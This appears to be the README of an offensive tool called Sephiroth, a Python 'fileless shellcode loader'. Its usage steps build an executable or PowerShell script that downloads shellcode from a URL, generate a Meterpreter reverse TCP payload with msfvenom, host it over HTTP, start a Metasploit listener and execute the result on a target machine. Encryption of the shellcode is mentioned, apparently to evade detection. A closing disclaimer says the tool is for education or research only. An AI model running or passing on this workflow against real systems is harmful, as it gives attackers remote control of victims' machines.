sephiroth is a Fileless Shellcode Loader with Python :
Usage: python Sephiros.py -url 'urlforshellcode'
u can generate a ps1 script with -ps instead of building into exe
python Sephiros.py -url 'urlforshellcode' -ps
you can also just embed shellcode into the PE directly using -sh 'pathofshellcode'
python Sephiros.py -sh 'pathto_shellcode'
pip install -r requirements.txt
python Sephiroth.py
generate shellcode with:
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=0.0.0.0 LPORT=5555 -f raw -o shellcode
python3 -m http.server 80
then:
python Sephiroth.py -url http://yourip/shellcode
start metasploit listener
execute PE on target machine
asymetric encryption to the shellcode
ME The author takes NO responsibility and/or liability for how you choose to use any of the tools/source code/any files provided. ME The author and anyone affiliated with will not be liable for any losses and/or damages in connection with use of Sephiros. By using Sephiros or any files included, you understand that you are AGREEING TO USE AT YOUR OWN RISK. Once again Sephiros is for EDUCATION and/or RESEARCH purposes ONLY